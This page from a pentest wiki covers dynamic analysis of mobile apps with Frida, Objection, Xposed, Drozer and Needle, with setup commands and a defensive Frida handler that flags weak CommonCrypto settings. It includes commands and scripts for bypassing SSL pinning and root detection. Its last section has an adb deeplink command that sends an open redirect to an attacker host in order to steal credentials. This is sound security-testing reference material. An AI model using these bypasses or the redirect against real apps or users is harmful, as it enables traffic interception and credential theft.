Dynamic Analysis

From pentestwiki.org

Android emulators

Genymotion

  • Genymotion Cloud: Cloud-based Android emulators running on SaaS or as virtual images on AWS, GCP or Alibaba Cloud (PaaS)
  • Genymotion Desktop: Desktop Android emulator

Android Studio

Frameworks

Frida

Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

Prerequisites:

  • Python 3
$sudo pip install frida-tools


Commands:

$frida-ps
$frida-ls-devices


Launch Snapchat on a USB-connected iPhone (-U) and trace the calls it makes into libcommonCrypto:

$frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"
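
As an added example (not part of the original page), a handler for CCCrypt in the shape frida-trace writes under __handlers__: it decodes the operation, algorithm, option bits and key length from the call arguments and logs weak configurations (legacy ciphers, ECB mode, odd AES key lengths) so they stand out in the trace. Constant values follow Apple's CommonCryptor.h; the weak-configuration rules are this example's own assumptions.

```javascript
// Added example: decode CCCrypt() arguments as seen by frida-trace and flag weak settings.
// Constant values are from Apple's CommonCryptor.h; the "weak" rules are this example's own choice.
const CC_OPERATIONS = { 0: 'kCCEncrypt', 1: 'kCCDecrypt' };
const CC_ALGORITHMS = { 0: 'AES', 1: 'DES', 2: '3DES', 3: 'CAST', 4: 'RC4', 5: 'RC2', 6: 'Blowfish' };
const kCCOptionPKCS7Padding = 0x0001;
const kCCOptionECBMode = 0x0002;

// Pure function: takes the integer argument values and returns a one-line summary
// plus a list of findings. Kept free of Frida APIs so it can be tested outside the device.
function describeCCCrypt(op, alg, options, keyLength) {
  const findings = [];
  const algName = CC_ALGORITHMS[alg] || `unknown(${alg})`;
  const opName = CC_OPERATIONS[op] || `unknown(${op})`;
  const ecb = (options & kCCOptionECBMode) !== 0;
  const pkcs7 = (options & kCCOptionPKCS7Padding) !== 0;
  if (['DES', 'RC4', 'RC2', 'CAST', 'Blowfish'].includes(algName)) {
    findings.push(`legacy algorithm ${algName}`);
  }
  if (algName === '3DES') findings.push('3DES is deprecated; expect AES');
  if (ecb && algName !== 'RC4') findings.push('ECB mode leaks plaintext patterns');
  if (algName === 'AES' && ![16, 24, 32].includes(keyLength)) {
    findings.push(`AES key length ${keyLength} is not 16/24/32 bytes`);
  }
  return { summary: `${opName} ${algName} keyLength=${keyLength} ecb=${ecb} pkcs7=${pkcs7}`, findings };
}

// Handler object in the shape frida-trace generates in __handlers__/libcommonCrypto.dylib/CCCrypt.js.
// CCCrypt(op, alg, options, key, keyLength, iv, dataIn, dataInLength, dataOut, dataOutAvailable, dataOutMoved)
const handler = {
  onEnter(log, args, state) {
    const info = describeCCCrypt(args[0].toInt32(), args[1].toInt32(), args[2].toInt32(), args[4].toInt32());
    log(`CCCrypt ${info.summary}`);
    info.findings.forEach((f) => log(`  [!] ${f}`));
  },
  onLeave(log, retval, state) {
    // kCCSuccess is 0; anything else is a CommonCrypto error status worth seeing in the trace
    if (retval.toInt32() !== 0) log(`  CCCrypt returned status ${retval.toInt32()}`);
  },
};
```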


Review:

https://grepharder.github.io/blog/0x03_learning_about_universal_links_and_fuzzing_url_schemes_on_ios_with_frida.html


Objection (frida)

Objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.

root #cd objection
root #pip3 install objection


SSL pinning bypass for iOS (-N connects over the network instead of USB; the second line is typed at the objection prompt):

$objection -N explore -q
# ios sslpinning disable


SSL pinning bypass for Android (same prompt convention as above):

$objection -N explore -q
# android sslpinning disable


Fridump (frida)

iOS

Needle is an open source modular framework which aims to streamline the entire process of conducting security assessments of iOS applications, and acts as a central point from which to do so. Needle is intended to be useful not only for security professionals, but also for developers looking to secure their code. A few examples of testing areas covered by Needle include: data storage, inter-process communication, network communications, static code analysis, hooking and binary protections.

Prerequisites:

  • Jailbroken device
  • Cydia
  • Apt 0.7 Strict


Android

Xposed

Framework that can change the behaviour of the system and apps without touching any APKs.


Drozer

root #drozer console connect


Cydia

Cydia Substrate: Cydia Substrate for Android enables developers to make changes to existing software with Substrate extensions that are injected into the target process's memory.

Techniques

root #adb install ./JustTrustMe.apk


root #adb install mobi.acpm.sslunpinning_latest.apk


root #adb install Android-SSL-TrustKiller.apk


  • Frida CodeShare: the Frida CodeShare project is made up of developers from around the world working together with one goal: push Frida to its limits in new and innovative ways.
  • Bypassing root detection:
root #frida --codeshare dzonerzy/fridantiroot -f YOUR_BINARY
  • Bypassing SSL pinning:
root #frida --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
  • JustTrustMe (source of the Xposed module installed above):
https://github.com/Fuzion24/JustTrustMe/blob/master/app/src/main/java/just/trust/me/Main.java
  • Root detection script (AppMon):
https://github.com/dpnishant/appmon/blob/master/intruder/scripts/Android/RootDetection.js
  • Pinning bypass hook (objection):
https://github.com/sensepost/objection/blob/master/objection/hooks/android/pinning/disable.js

Invoke deeplinks manually

How to use an open redirect to steal credentials ($INTENT, $DEEPLINK, $PARAM and $ATTACKER are placeholders for the scheme, host, redirect parameter and attacker host; the URI is quoted so the shell does not expand the ? and $ characters):

$adb shell am start -a android.intent.action.VIEW -d "$INTENT://$DEEPLINK?$PARAM=https://$ATTACKER" --ez authentication_header true


